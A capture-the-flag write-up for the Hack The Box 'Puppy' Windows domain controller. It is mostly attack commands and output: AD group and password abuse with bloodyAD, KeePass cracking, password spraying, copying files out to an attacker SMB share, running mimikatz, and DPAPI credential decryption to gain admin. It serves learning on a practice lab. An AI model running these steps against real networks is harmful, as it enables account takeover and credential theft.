> m4rt@CTF_ARCHIVE:~$

Hack The Box / WINDOWS / 2026-03-18

Hack The Box — Puppy (Windows)

AD graph abuse from provided credentials to access DEV share and KeePass secrets, multi-user password control pivots, and DPAPI credential decryption to reach steph.cooper_adm and root.

Target

  • IP: 10.129.232.226

Machine information

As is common in real-life pentests, you start the Puppy box with credentials for the following account:

  • levi.james / KingofAkron2025!

Recon

sudo nmap -sC -sV 10.129.232.226 -p- -T5 -v
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-18 22:12:46Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3260/tcp  open  iscsi?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49691/tcp open  msrpc         Microsoft Windows RPC
61853/tcp open  msrpc         Microsoft Windows RPC
62008/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

A domain controller (DNS, Kerberos, LDAP, SMB, WinRM) that also exposes NFS and iSCSI. Check what the provided credentials can see over SMB:

nxc smb 10.129.232.226 -u 'levi.james' -p 'KingofAkron2025!' --shares
SMB         10.129.232.226  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.232.226  445    DC               [*] Enumerated shares
SMB         10.129.232.226  445    DC               Share           Permissions     Remark
SMB         10.129.232.226  445    DC               -----           -----------     ------
SMB         10.129.232.226  445    DC               ADMIN$                          Remote Admin
SMB         10.129.232.226  445    DC               C$                              Default share
SMB         10.129.232.226  445    DC               DEV                             DEV-SHARE for PUPPY-DEVS
SMB         10.129.232.226  445    DC               IPC$            READ            Remote IPC
SMB         10.129.232.226  445    DC               NETLOGON        READ            Logon server share
SMB         10.129.232.226  445    DC               SYSVOL          READ            Logon server share

The DEV share (remark: DEV-SHARE for PUPPY-DEVS) looks interesting, but levi.james has no permission on it yet.

nxc ldap 10.129.232.226 -u 'levi.james' -p 'KingofAkron2025!'
SMB         10.129.232.226  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
LDAP        10.129.232.226  389    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!

Add puppy.htb to /etc/hosts.

ldapdomaindump puppy.htb -u 'puppy.htb\levi.james' -p 'KingofAkron2025!'

From domain_computers.html we see there is a host called DC.

Add dc.puppy.htb to /etc/hosts.

From domain_users.json we discover these users:

steph.cooper_adm
steph.cooper
jamie.williams
adam.silver
ant.edwards
levi.james
krbtgt
Guest
Administrator

Put them in a users.txt file.

Alternatively, brute-force RIDs over SMB and keep only the SidTypeUser entries (the cut chain strips the domain prefix and the trailing SID type):

nxc smb dc.puppy.htb -d puppy.htb -u 'levi.james' -p 'KingofAkron2025!' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt

This list also contains the machine account DC$, which is a SidTypeUser as well.

bloodhound-python -u 'levi.james' -p 'KingofAkron2025!' -ns 10.129.232.226 -d 'puppy.htb' -dc 'dc.puppy.htb' -c All --zip

A zip file is created.

sudo bloodhound

Upload the zip.

Old BloodHound legacy queries:

  • https://github.com/SpecterOps/BloodHound-Legacy/blob/master/src/components/SearchContainer/Tabs/PrebuiltQueries.json

In BloodHound click levi.james --> outbound object control.

We see levi.james is a member of group HR, which has GenericWrite over group DEVELOPERS. GenericWrite on a group covers its member attribute, so we can add ourselves to DEVELOPERS.

Click group developers --> members.

We see members are ant.edwards, adam.silver, and jamie.williams.

net rpc group addmem "developers" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "dc.puppy.htb"
net rpc group members "developers" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "dc.puppy.htb"

We confirm levi.james is in the group.

nxc smb 10.129.232.226 -u 'levi.james' -p 'KingofAkron2025!' --shares

Now we can read the DEV share.

smbclient -U levi.james '\\10.129.232.226\DEV'

dir
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 08:09:12 2025
  Projects                            D        0  Sat Mar  8 17:53:36 2025
  recovery.kdbx                       A     2677  Wed Mar 12 03:25:46 2025

Inside Projects there is nothing.

Download recovery.kdbx.

./john/run/keepass2john recovery.kdbx > john_hash.txt
./john/run/john --wordlist=./rockyou.txt john_hash.txt

We get password: liverpool.

keepassxc-cli export recovery.kdbx > output.xml

Enter the discovered password.

Exporting the database shows, among other entries, what appear to be user passwords:

  • password of jamie.williams: JamieLove2025!
  • password of adam.silver: HJKL2025!
  • password of ant.edwards: Antman2025!

Put these passwords, plus the one for levi.james, in a passwords.txt file and spray them against the user list:

nxc smb puppy.htb -u users.txt -p passwords.txt --continue-on-success

Only two combinations authenticate:

SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!

From BloodHound we see ant.edwards is a member of group SENIOR DEVS, which has GenericAll over adam.silver. GenericAll allows a straight password reset. That is destructive (the old password is lost and the reset is logged on the DC), so on a real engagement consider the less intrusive options GenericAll also opens, such as adding shadow credentials; here we simply reset it.

Download bloodyAD:

  • https://github.com/CravateRouge/bloodyAD

python3 bloodyAD/bloodyAD.py --host 'dc.puppy.htb' -d puppy.htb --dc-ip dc.puppy.htb -u 'ant.edwards' -p 'Antman2025!' set password 'adam.silver' '!Kali12345678!'
[+] Password changed successfully!
nxc smb puppy.htb -u 'adam.silver' -p '!Kali12345678!'
SMB         10.129.232.226  445    DC               [-] PUPPY.HTB\adam.silver:!Kali12345678! STATUS_ACCOUNT_DISABLED
getTGT.py 'puppy.htb'/'adam.silver':'!Kali12345678!' -dc-ip dc.puppy.htb
Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

The reset worked, but the account is disabled: NTLM returns STATUS_ACCOUNT_DISABLED and Kerberos KDC_ERR_CLIENT_REVOKED. GenericAll also lets us write userAccountControl, so clear the ACCOUNTDISABLE bit:

python3 bloodyAD/bloodyAD.py -d puppy.htb --host dc.puppy.htb --dc-ip dc.puppy.htb -u 'ant.edwards' -p 'Antman2025!' remove uac adam.silver -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
nxc smb puppy.htb -u 'adam.silver' -p '!Kali12345678!'
SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\adam.silver:!Kali12345678!
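
What that bloodyAD step changed, as an added example (Python written for this writeup, not code from the page or from bloodyAD): userAccountControl is a bit field on the user object, and `remove uac adam.silver -f ACCOUNTDISABLE` reads it, clears bit 0x2 and writes it back. The flag table below is the documented userAccountControl layout; the value 0x0202 and the error mapping for a disabled account are constructed from what this box showed, and the script touches no directory.

```python
"""Decode and edit a userAccountControl value.

This is what `bloodyAD ... remove uac adam.silver -f ACCOUNTDISABLE` does to
the directory object: read the attribute, clear the 0x2 bit, write it back.
Added example for this writeup, not code from the page or from bloodyAD.
Flag names and values are the documented userAccountControl bits; the sample
values passed in below are constructed, not read from the target.
"""

UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,
    "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x4000000,
}


def decode_uac(value):
    """Names of the flags set in value, lowest bit first; unknown bits kept as hex."""
    known = 0
    names = []
    for name, bit in sorted(UAC_FLAGS.items(), key=lambda kv: kv[1]):
        known |= bit
        if value & bit:
            names.append(name)
    if value & ~known:
        names.append(hex(value & ~known))
    return names


def remove_uac_flags(value, names):
    """New attribute value after clearing the named flags (bloodyAD 'remove uac')."""
    for name in names:
        value &= ~UAC_FLAGS[name]
    return value


def add_uac_flags(value, names):
    """New attribute value after setting the named flags (bloodyAD 'add uac')."""
    for name in names:
        value |= UAC_FLAGS[name]
    return value


def expected_logon_errors(value):
    """Errors a logon will hit for the flag this box tripped on: nxc over SMB/NTLM
    reports STATUS_ACCOUNT_DISABLED, a Kerberos AS-REQ (getTGT.py) gets
    KDC_ERR_CLIENT_REVOKED. Only ACCOUNTDISABLE is mapped, matching the writeup."""
    errors = {}
    if value & UAC_FLAGS["ACCOUNTDISABLE"]:
        errors["ACCOUNTDISABLE"] = ("STATUS_ACCOUNT_DISABLED", "KDC_ERR_CLIENT_REVOKED")
    return errors


if __name__ == "__main__":
    current = 0x0202  # constructed: NORMAL_ACCOUNT | ACCOUNTDISABLE, a disabled domain user
    print("before:", hex(current), decode_uac(current), expected_logon_errors(current))
    fixed = remove_uac_flags(current, ["ACCOUNTDISABLE"])
    print("after :", hex(fixed), decode_uac(fixed), expected_logon_errors(fixed))
```

A disabled ordinary domain user reads 0x0202 (NORMAL_ACCOUNT | ACCOUNTDISABLE) and an enabled one 0x0200, which is why the password reset succeeded while both NTLM and Kerberos logons still failed until the bit was cleared.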

From BloodHound we notice adam.silver is in group REMOTE MANAGEMENT USERS.

evil-winrm -i dc.puppy.htb -u 'adam.silver' -p '!Kali12345678!'

We get a PowerShell shell on the target machine as adam.silver.

cd \Backups
ls
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip

Download it.

On attacker machine run:

smbserver.py -smb2support -username test12 -password test12 share $(pwd)

On target machine run:

net use \\10.10.14.252\share test12 /USER:test12
cp site-backup-2024-12-30.zip \\10.10.14.252\share\

Now we have the file on the attacker machine.

unzip site-backup-2024-12-30.zip

In file nms-auth-config.xml.bak we find:

    <server>
        <host>DC.PUPPY.HTB</host>
        <port>389</port>
        <base-dn>dc=PUPPY,dc=HTB</base-dn>
        <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
        <bind-password>ChefSteph2025!</bind-password>
    </server>

This is the LDAP bind password for steph.cooper. Check it against the user list:

nxc smb puppy.htb -u users.txt -p 'ChefSteph2025!' --continue-on-success
SMB         10.129.232.226  445    DC               [+] PUPPY.HTB\steph.cooper:ChefSteph2025!
evil-winrm -i dc.puppy.htb -u 'steph.cooper' -p 'ChefSteph2025!'

We get a PowerShell shell on the target machine as steph.cooper.

cd C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
ls -h

There is a file C8D69EBE9A43E9DEBF6B5FBD48B521B9.

type C8D69EBE9A43E9DEBF6B5FBD48B521B9

Inside we notice the string:

Enterprise Credential Data

That marks a Credential Manager (CredMan) blob: a saved credential encrypted with DPAPI under the user's master key. The master key itself is protected with a key derived from the user's password and SID, and we have both.

Upload mimikatz.exe to C:\tmp on the target (the DC) and point dpapi::cred at the blob to read its header:

  • https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe
C:\tmp\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" exit

The blob header references the master key by GUID:

guidMasterKey      : {556a2412-1275-4ccf-b721-e6a0b4f90407}

The master key is in file C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<sid>\<guid>, where <sid> is the current user's SID and <guid> is the master key GUID. The Protect directory and the key files carry the hidden and system attributes, so a plain ls does not show them; use ls -Force or address the file by its full path.

whoami /all

We see that SID of steph.cooper is S-1-5-21-1487982659-1829050783-2281216199-1107.

certutil -encode C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 C:\tmp\masterkey_encoded.txt
type C:\tmp\masterkey_encoded.txt

Copy only the base64 body (certutil wraps it in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines, which base64 -d rejects) into file roba.b64 on the attacker machine.

base64 -d roba.b64 > masterkey
dpapi.py masterkey -file masterkey -sid 'S-1-5-21-1487982659-1829050783-2281216199-1107' -password 'ChefSteph2025!'
[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
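
To see what dpapi.py just parsed, the following Python (an added example written for this writeup, not code from the page, from impacket or from mimikatz) walks the fixed header of a master key file and splits it into its four blobs, MasterKey, BackupKey, CredHist and DomainKey, decoding the PBKDF2 salt, round count and algorithm IDs that the password-derived key is applied to. It assumes the public layout of impacket's MasterKeyFile / mimikatz's KULL_M_DPAPI_MASTERKEYS structures. build_sample_file() constructs a fake file with the GUID and section lengths from the output above but filler bytes for the key material, so nothing in it can be decrypted; masterkey_path() is a helper added here for the path template described earlier.

```python
"""Parse a DPAPI master key file (%APPDATA%\\Microsoft\\Protect\\<SID>\\<GUID>).

Added example for this writeup, not code from the page, from impacket or from
mimikatz. Layout follows the public MasterKeyFile / KULL_M_DPAPI_MASTERKEYS
structures. The sample file is CONSTRUCTED: GUID and section lengths match the
dpapi.py output above, but all key material is filler, so it cannot be decrypted.
"""
import struct
import uuid

# 128-byte file header: version, two reserved DWORDs, GUID as 36 UTF-16LE chars,
# a reserved DWORD, the DWORD impacket prints as "Policy", flags, then the
# 64-bit lengths of the four blobs that follow, in this order.
MKF_HEADER = struct.Struct("<III72sIIIQQQQ")
# MasterKey / BackupKey blob header: version, 16-byte PBKDF2 salt, rounds,
# hash ALG_ID, cipher ALG_ID; the encrypted key bytes follow.
KEY_HEADER = struct.Struct("<I16sIII")
# DomainKey blob header: version, secret length, access-check length, binary GUID;
# the secret wrapped with the domain backup key and the access-check bytes follow.
DOMKEY_HEADER = struct.Struct("<III16s")

ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1",
             0x8009: "CALG_HMAC", 0x800E: "CALG_SHA_512"}

GUID = "556a2412-1275-4ccf-b721-e6a0b4f90407"           # from the writeup
SID = "S-1-5-21-1487982659-1829050783-2281216199-1107"  # steph.cooper, from the writeup


def masterkey_path(user, sid, guid):
    """Where Windows keeps the per-user master key file for this SID/GUID."""
    return rf"C:\Users\{user}\AppData\Roaming\Microsoft\Protect\{sid}\{guid}"


def parse_key_blob(blob):
    """Header of a MasterKey/BackupKey blob; the rest is the encrypted key."""
    version, salt, rounds, alg_hash, alg_crypt = KEY_HEADER.unpack_from(blob)
    return {"version": version, "salt": salt.hex(), "rounds": rounds,
            "hash_alg": ALG_NAMES.get(alg_hash, hex(alg_hash)),
            "crypt_alg": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "encrypted_len": len(blob) - KEY_HEADER.size}


def parse_masterkey_file(data):
    """Return the header fields and the parsed sub-blobs; raise on a truncated file."""
    (version, _unk0, _unk1, guid_raw, _unk2, policy, flags,
     mk_len, bk_len, ch_len, dk_len) = MKF_HEADER.unpack_from(data)
    lengths = {"MasterKey": mk_len, "BackupKey": bk_len,
               "CredHist": ch_len, "DomainKey": dk_len}
    expected = MKF_HEADER.size + sum(lengths.values())
    if len(data) != expected:
        raise ValueError(f"file is {len(data)} bytes, header describes {expected}")
    info = {"version": version, "guid": guid_raw.decode("utf-16le").rstrip("\x00"),
            "policy": policy, "flags": flags, "lengths": lengths}
    off = MKF_HEADER.size
    blobs = {}
    for name, length in lengths.items():  # blobs sit back to back in this order
        blobs[name] = data[off:off + length]
        off += length
    if mk_len:
        info["masterkey"] = parse_key_blob(blobs["MasterKey"])
    if bk_len:
        info["backupkey"] = parse_key_blob(blobs["BackupKey"])
    if dk_len:
        v, secret_len, check_len, g = DOMKEY_HEADER.unpack_from(blobs["DomainKey"])
        info["domainkey"] = {"version": v, "secret_len": secret_len,
                             "access_check_len": check_len,
                             "guid": str(uuid.UUID(bytes_le=g))}
    return info


def is_wellformed(data):
    """True when the header and the four blob lengths account for every byte."""
    try:
        parse_masterkey_file(data)
        return True
    except (ValueError, struct.error):
        return False


def build_sample_file():
    """CONSTRUCTED master key file: real GUID and lengths, filler key material."""
    def fill(n, b):
        return bytes([b]) * n
    mk = KEY_HEADER.pack(2, fill(16, 0x11), 18000, 0x800E, 0x6610) + fill(104, 0xAA)  # 136 B
    bk = KEY_HEADER.pack(2, fill(16, 0x22), 18000, 0x800E, 0x6610) + fill(72, 0xBB)   # 104 B
    dk = (DOMKEY_HEADER.pack(1, 256, 88, uuid.UUID(GUID).bytes_le)
          + fill(256, 0xCC) + fill(88, 0xDD))                                      # 372 B
    hdr = MKF_HEADER.pack(2, 0, 0, GUID.encode("utf-16le"), 0, 0, 0,
                          len(mk), len(bk), 0, len(dk))
    return hdr + mk + bk + dk


if __name__ == "__main__":
    print(masterkey_path("steph.cooper", SID, GUID))
    for key, value in parse_masterkey_file(build_sample_file()).items():
        print(f"{key:10}: {value}")
```

The lengths 136/104/0/372 are exactly what dpapi.py printed: a 136-byte MasterKey blob is a 32-byte header plus 104 bytes of ciphertext, and a 372-byte DomainKey is the 28-byte header plus a 256-byte secret and an 88-byte access check, the shape you get on a domain-joined machine where the key is also escrowed to the domain backup key.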

The master key was unwrapped with the MD4 variant: for domain accounts DPAPI derives the key-encryption key from the NT hash (MD4 of the UTF-16LE password) and the user's SID, which is why dpapi.py needs -sid alongside the password. With the 64-byte master key in hand, go back to the target and encode the credential blob the same way:

certutil -encode C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 C:\tmp\cred_encoded.txt
type C:\tmp\cred_encoded.txt

Copy the base64 body (again without the certutil header and footer lines) into roba.b64.

base64 -d roba.b64 > cred
dpapi.py credential -file cred -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description :
Unknown     :
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

The last Unknown field is the stored password, here for the privileged account steph.cooper_adm. Check it:

nxc smb puppy.htb -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!'
SMB         10.129.54.90    445    DC               [+] PUPPY.HTB\steph.cooper_adm:FivethChipOnItsWay2025! (Pwn3d!)
evil-winrm -i dc.puppy.htb -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!'

We get a PowerShell shell as steph.cooper_adm.

(Pwn3d!) in the nxc output means steph.cooper_adm has administrative access on the DC. The root flag is in C:\Users\Administrator\Desktop\root.txt.